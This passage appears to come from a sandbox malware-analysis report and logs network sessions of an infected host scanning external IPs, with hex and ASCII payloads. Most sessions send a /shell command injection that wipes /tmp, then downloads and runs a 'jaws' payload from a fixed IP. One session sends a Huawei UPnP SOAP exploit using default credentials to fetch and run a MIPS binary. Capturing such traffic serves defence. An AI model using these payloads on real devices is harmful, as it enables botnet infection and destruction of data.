22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            260192.168.2.234602638.47.144.16380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.998716116 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:53.326186895 CET400INHTTP/1.1 400 Bad Request
                                                            Server: WAF
                                                            Date: Fri, 26 Jan 2024 14:31:53 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: waf_404=4c640ab9-2e80-4ffb-b49f-362cfc48083f; Max-Age=300; Path=/; HttpOnly
                                                            Cache-Control: no-cache, no-store
                                                            x-frame-options: sameorigin
                                                            Data Raw: 35 36 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3d 27 2f 68 6f 73 74 5f 6e 6f 74 5f 66 6f 75 6e 64 5f 65 72 72 6f 72 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 56<html><body><script>document.location='/host_not_found_error';</script></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            261192.168.2.2346194139.9.139.4480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:53.004487991 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:53.330931902 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            262192.168.2.236058041.47.185.5837215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:53.094754934 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:53.417663097 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            263192.168.2.234076623.59.184.24680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:53.132853985 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:53.510590076 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:53 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:53 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 34 37 33 32 63 33 31 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 33 26 23 34 36 3b 31 32 39 62 39 34 66 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;d4732c31&#46;1706279513&#46;129b94f6</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            264192.168.2.233310823.211.159.19680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:53.309814930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:53.754976034 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:53 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:53 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 35 66 36 33 37 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 33 26 23 34 36 3b 32 32 61 64 38 64 32 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;c5f63717&#46;1706279513&#46;22ad8d2a</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            265192.168.2.235419050.98.58.3980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:53.687421083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:53.885432959 CET36INHTTP/1.1 403 Forbidden
                                                            Jan 26, 2024 15:31:53.886389017 CET221INData Raw: 53 65 72 76 65 72 3a 20 61 6c 70 68 61 70 64 2f 32 2e 31 2e 38 0d 0a 44 61 74 65 3a 20 46 72 69 20 4a 61 6e 20 32 36 20 30 36 3a 33 31 3a 35 33 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e
                                                            Data Ascii: Server: alphapd/2.1.8Date: Fri Jan 26 06:31:53 2024Pragma: no-cacheCache-Control: no-cacheContent-type: text/htmlContent-length: 62<html><body><h1>The request is forbidden.</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            266192.168.2.234477841.111.206.21780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:53.908579111 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            267192.168.2.2353606163.15.153.10880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:53.983414888 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:54.884181023 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:56.675908089 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            268192.168.2.2338206106.252.219.2880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:54.023823023 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:54.332564116 CET470INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 341
                                                            Date: Fri, 26 Jan 2024 14:31:53 GMT
                                                            Server: fwebserver
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 Not Found</title> </head> <body> <h1>404 Not Found</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            269192.168.2.236026023.77.27.11580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:54.025906086 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:54.364393950 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:54 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:54 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 30 62 63 36 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 34 26 23 34 36 3b 31 30 37 31 34 34 31 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;c0bc617&#46;1706279514&#46;10714410</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            270192.168.2.235015652.7.93.3880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.485743999 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:55.602391005 CET377INHTTP/1.1 302 Moved Temporarily
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 110
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            271192.168.2.234861664.68.224.6880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.514444113 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            272192.168.2.234498418.66.134.20480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.571417093 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:55.772454023 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            273192.168.2.2348658104.81.5.20780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.581361055 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:55.792437077 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:55 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 65 66 30 31 36 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 35 26 23 34 36 3b 64 32 35 37 66 30 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5ef01602&#46;1706279515&#46;d257f0f</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            274192.168.2.233661479.120.228.19080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:55.590445995 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:55.810293913 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:58 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
